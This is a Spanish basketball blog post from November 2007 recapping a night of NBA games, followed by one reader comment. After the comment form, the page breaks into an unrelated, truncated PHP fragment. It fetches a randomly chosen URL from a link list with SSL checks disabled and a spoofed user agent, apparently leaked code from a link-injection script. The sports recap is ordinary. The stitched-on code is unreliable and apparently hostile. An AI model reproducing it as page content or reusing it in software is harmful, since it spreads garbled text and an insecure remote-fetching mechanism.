La crónica (21/11/07)

22 de November de 2007 por MagicJohnson32

Muchos partidos se disputaron la pasada madrugada, entre ellos la oportunidad frustrada de ver por primera vez a cuatro españoles en un partido NBA. Así pues, la noche ofreció de todo, como una nueva victoria de los Wizards sin Arenas (y que se acostumbren a jugar sin él porque va para largo), otra triste derrota de los Heat o el espectacular Magic-Spurs. Los Pistons aumentaron unos cuantos grados más la temperatura de la silla de Isiah, que cada día quema más. Redd y los Bucks superaron a Bryant y los Lakers, los Celtics impusieron su defensa al ataque de los Warriors, los Nets acabaron con su racha negativa y los Clippers ganaron a Denver en la reedición de su duelo en los pasados Playoffs. Además, los Mavs volvieron a remontar y los Suns lograron su séptima victoria seguida.

Vamos con la crónica de todos los partidos jugados anoche:

Wizards 114 – Bobcats 111

A falta de Arenas, mucho Butler. Así resistieron los Wizards en Charlotte, en un partido decidido en la prórroga y que se jugó poco después de que la franquicia capitalina conociese que estará sin Arenas durante los próximos tres meses. Así, con sólo 9 jugadores disponibles (Haywood también fue baja), Eddie Jordan echó mano de sus recursos, improvisó con Blatche como pívot titular tras su gran actuación ante los Sixers, y se encontró con la mejor actuación de Butler esta temporada: 39 puntos con 13 de 23 en tiros de campo y 12 de 12 en libres. Jamison y Blatche lograron dobles-dobles, algo que permitió a los Wizards atrapar 13 rebotes más que su rival, y Daniels volvió a rendir bien como base titular con 14-8-6-4. En los Bobcats falló Richardson, mientras Felton, Okafor y Wallace lograron más de 20 puntos cada uno. Es la sexta victoria seguida de los Wizards tras empezar 0-5.

Warriors 82 – Celtics 105

Uno de los mejores ataques de la liga visitaba a la mejor defensa. Resultado: habría que irse bastante tiempo atrás para saber cuándo fue la última vez que los Warriors anotaron tan pocos puntos como ayer. Los Celtics se impusieron con contundencia y se recuperaron de la primera derrota de la temporada, la que encajaron en su partido contra Orlando. A los casi rutinarios 21 puntos de Ray Allen, 20 con 10 rebotes de Garnett y 19-10 de Pierce se unió anoche Eddie House con 15 puntos, mientras que en los Warriors sólo lució Monta Ellis con 10 de 15 en tiros y 21 puntos. Los Warriors, que tuvieron un 33.3% de acierto en tiros de campo, sumaron su séptima derrota de la temporada y pusieron fin a una racha de tres victorias consecutivas.

Hawks 82 – Heat 79

El factor Wade da menos resultados de los esperados. Los Heat siguen perdiendo partidos con anotaciones paupérrimas y anoche, en la visita de los Hawks, no fue excepción pese al buen partido de O’Neal, 18 puntos, 10 rebotes y 7 tapones. Wade, aún bajo de forma, no pudo brillar. Y si el debate sobre los bases de los Heat ya era intenso, anoche éstos dieron más motivos: 0 puntos y 4 asistencias de Jason Williams en 24 minutos y 0 puntos y 0 asistencias de Smush Parker en 15. Los Hawks, que necesitaron un parcial de 26-13 en el cuarto final, tuvieron a Joe Johnson como máximo anotador con 22-7-4, y Marvin Williams y Josh Smith lograron doble-doble en puntos y rebotes. Smith, además, taponó el intento de bandeja de Wade y aseguró la primera victoria como visitante de los Hawks tras 17 derrotas. Aquí tienes la jugada decisiva:

Knicks 86 – Pistons 98

Otro partido, otra derrota, otro pasito más cerca del despido para Isiah. Cada vez parece más claro que el que fuera gran base de los bad boys no durará mucho tiempo en el banquillo del Madison. La gente está contra él, incluso parece que los jugadores le hacen la cama. Presuntamente. El partido en sí tiene poco que comentar, los Knicks nunca parecieron competir, los Pistons se fueron rápidamente en el marcador y a esperar a que pasen los 48 minutos. Eddie Curry anotó 26 puntos, único destacado de los de la gran manzana, mientras por Detroit Billups hizo 25 y 15 asistencias, y McDyess 20 puntos con una serie de 9 de 14 en el tiro.

Lakers 103 – Bucks 110

Fin a la racha de victorias de los Lakers, que llegaban a Milwaukee tras cuatro triunfos seguidos. Redd se impuso a Bryant en su particular duelo y Odom volvió a acusar su bajo estado de forma con apenas 8 puntos y 3 de 11 en tiros. Pese a un nuevo doble-doble de Bynum, 16-13 en apenas 26 minutos, los Bucks demostraron más recursos con 6 jugadores en dobles figuras en anotación. Una de las claves de los recientes triunfos de Lakers, la aportación del banquillo, resultó esta vez negativa, ya que, al margen de Walton, ningún otro jugador logró más de 6 puntos. Los angelinos se pusieron 5 arriba al final del tercer cuarto, en el que Kobe anotó 15 puntos, pero un parcial de 13-3 puso a los Bucks por delante en el período final y ya no dejaron escapar su ventaja.

Raptors 95 – Grizzlies 89

Partido casi histórico en Memphis, donde se ha frustrado la primera oportunidad de ver a 4 españoles en una cancha de la NBA. Esperemos que la siguiente oportunidad sea la buena. Mal partido con dos conjuntos que trataron, con poco éxito, explotar las debilidades de su rival. El ataque de Memphis se intentó centrar en la supuesta debilidad interior de Toronto y la diferencia de puntos interiores de uno y otro equipo fue fruto de ello. Como consecuencia de este intento de jugar por dentro, el equipo canadiense se cargó de faltas rápidamente, lo que provocó una gran cantidad de tiros libres, bien aprovechados por los Grizzlies. Estos 20 puntos de tiros libres les mantuvo a flote en el partido. El ataque de Toronto recurrió a los tiros exteriores y pisó la pintura lo menos posible. La fortuna con los triples cayó del lado canadiense, en especial en los momentos finales, y su 52% de acierto frente al pobre 20% de Memphis decidió en parte el partido. En el aspecto individual, destacaron los 22 puntos y 19 rebotes de Bosh por parte de Toronto, que estuvo casi todo el tercer cuarto en el banco con 4 faltas personales. En Memphis, los 16 puntos y 10 rebotes de Gasol y Miller fueron los datos positivos. En el lado negativo, el mal partido en el tiro de Bargnani, sobre todo en la primera parte, que al descanso tenía un 0-9. Consiguió maquillar su actuación al final con un par de triples decisivos y con sus 11 rebotes. Calderón, es su primer partido como titular ante la baja de TJ Ford, dirigió bien el encuentro, marcando un ritmo cansino y repartiendo 8 asistencias. Todo lo contrario que los bases rivales, Stoudamire y en particular Kyle Lowry, que se empeñaron en darle velocidad, y en muchas ocasiones, precipitación a un ataque anárquico. Navarro no tuvo un buen día, con sólo dos puntos en una serie de 1 de 5 con 0 de 3 en triples.

Cavaliers 97 – Timberwolves 86

Los Cavaliers habían empezado muy mal la temporada, y eso a Lebron no le gustó nada. Así que se ha puesto a ganar partidos él solito. Esta noche firmó 45 puntos, 8 rebotes y 5 asistencias, 17 de 26 en tiros de campo con 6 de 10 en triples. Como mejor ayudante ha tenido a Gooden, 17 puntos y 9 rebotes. Por los Wolves sólo Al Jefferson ha dado la cara, con 30 puntos y 8 rebotes. Los demás, poca cosa: 13 puntos de Gerald Green, que ha tenido minutos y además los ha aprovechado, cosa que no suele suceder. El partido, a pesar de ir más o menos apretado en el tanteador, no ha tenido más historia que la que ha querido King James.

Pacers 105 – Hornets 93

Duelo de ausencias en el puesto de center, por un lado faltaba Jermaine O’Neal, por el otro, Tyson Chandler. La victoria fue para Indiana, pero en el duelo de ausentes ganó Chandler, puesto que su equipo lo echó mucho más en falta. De hecho, podría decirse que Indiana mejoró sin Jermaine. El partido estaba siendo igualado pero en el tercer cuarto los Pacers pegaron un arreón que les hizo irse por 10 en el marcador, distancia que los Hornets ya no pudieron enjugar. Hay que destacar la gran actuación de todo el quinteto de Indiana desde Tinsley (18 puntos y 13 asistencias, con sólo dos pérdidas) a Foster, con 8 puntos y 13 rebotes, pasando por Dunleavy (18 puntos, 7 rebotes 4 asistencias) y Granger (22 puntos 9 rebotes), pero el mejor fue Troy Murphy (23 puntos 9 rebotes, con 3 de 5 en triples). Por los Hornets la mejor noticia fue la vuelta de Chris Paul, que no hizo un gran partido. David West tiró del carro, con 23 puntos.

Magic 110 – Spurs 128

Es lo que tienen los Spurs, que te ganan en partidos a 80 puntos y te ganan en partidos a 130. En concreto fueron 128 los que les endosaron a Orlando anoche en un partido en el que destacó el espectacular duelo Duncan-Howard. El de las Islas Vírgenes logró 20 puntos, 16 rebotes y 5 asistencias; Dwight se fue hasta los 34-16 con 3 tapones. El factor desequilibrante, sin embargo, volvió a ponerlo la pareja Parker-Ginóbili: 32-9 del francés con 14 de 22 en tiros, y 27-4-5 del argentino. Además, Brent Barry logró 5 de 6 en triples y 19 puntos, mientras que en los Magic falló Rashard Lewis, con sólo 12 puntos. Sí brilló Turkoglu con 26-5-5, y Nelson logró 15-5-9, pero no resultaron suficientes ante el poderío de los Spurs en un último cuarto demoledor: 20-35. El dato más destacable del partido fueron, sin embargo, las 3 pérdidas que cometió San Antonio en todo el partido.

Nets 106 – Blazers 101

Y los Nets cortaron su racha de 6 derrotas consecutivas, todas coincidiendo con la baja de Vince Carter. Hoy Jason Kidd, con un triple doble (12 puntos, 13 asistencias, 11 rebotes) se echó el equipo a las espaldas enmendando de alguna manera el desastroso partido de antesdeayer. Ayudado por un Richard Jefferson en estado de gracia (30 puntos), un Nachbar que demuestra que puede dar minutos de calidad desde el banquillo y el retorno a medio gas de Vince Carter, Jason llevó a los Nets a una victoria que se decidió en los minutos finales. Por parte de los Blazers destacaron Brandon Roy con 25 puntos y 6 asistencias y Lamarcus Aldridge con 14 puntos y 8 rebotes. Esta derrota supone la primera de Portland en su pabellón esta temporada.

Kings 111 – Suns 127

Séptima victoria consecutiva de los Suns, esta vez ante unos Kings peleones pero que nunca pusieron en apuros al equipo de Arizona. Y es que Sacramento salió también a correr y ése es un juego en el que Phoenix se mueve como pez en el agua, como demuestra el 38-47 que reflejaba el marcador al finalizar el primer cuarto. Hay partidos de ACB que a veces les cuesta llegar a estas puntuaciones en 40 minutos. Los Suns, con una actuación estelar de su quinteto, se relajaron en el último cuarto, dando tiempo a los jugadores menos habituales como Alando Tucker, Brian Skinner o Marcus Banks. Por parte de los Kings el mejor fue Francisco García que, debido a la baja de Beno Udrih, volvió a jugar en la posición de base y consiguió 31 puntos, 6 rebotes y 5 asistencias. Destacaron también Kevin Martin y John Salmons, éste último aprovechando la baja de Ron Artest por cuestiones personales.

Mavs 100 – Rockets 92

En Dallas le están cogiendo el gustillo a esto de remontar. Ayer perdían por 19 puntos a la mitad del tercer cuarto pero se cargaron de oficio y acabaron venciendo, no sin cierto suspense, en el Toyota Center de Houston. Davin Harris confirma su buen momento de forma con otro gran partido y, con los habituales Josh Howard y Dirk Nowitzky y la ayuda de Brandon Bass y Jerry Stackhouse, un triple suyo en los últimos momentos aseguró una trabajada victoria. Por parte de Houston Yao Ming volvió a ser el mejor con 30 puntos y 15 rebotes. McGrady en su vuelta a las canchas dio 12 asistencia pero tuvo pésimos porcentajes de tiro.

Nuggets 90 – Clippers 101

Otra racha de 6 partidos se vio truncada en Los Ángeles. Esta vez fue la de 6 partidos ganados consecutivamente por parte de los Denver Nuggets. Chris Kaman con 17 puntos y 21 rebotes fue el principal culpable pero en los Clippers destacó el juego de equipo con 5 jugadores por encima de los 10 puntos. El rookie Al Thorton jugó su primer partido como titular cuajando una buena actuación con 12 puntos y 8 rebotes. En Denver destacaron los 3 de siempre: el poder anotador de Melo e Iverson con 24 y 29 puntos respectivamente y el poderio bajo los tableros de Camby con 18 puntos y 18 rebotes. El resto del equipo se dedicó a dormitar bajando de manera importante sus aportaciones respecto a otros partidos. Después de este encuentro ambos equipos mantienen su saldo positivo en el cómputo global de victorias – derrotas y Mike Dunleavy iguala con 158 el récord de victorias de la franquicia por parte de un entrenador.

Acabamos con las mejores jugadas de la noche:

 

Comenta

Un comentario a esta entrada

  1. txusma dice:
    #1

    Para ser un intento de triple Wade tira de muy cerca no? 😀

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>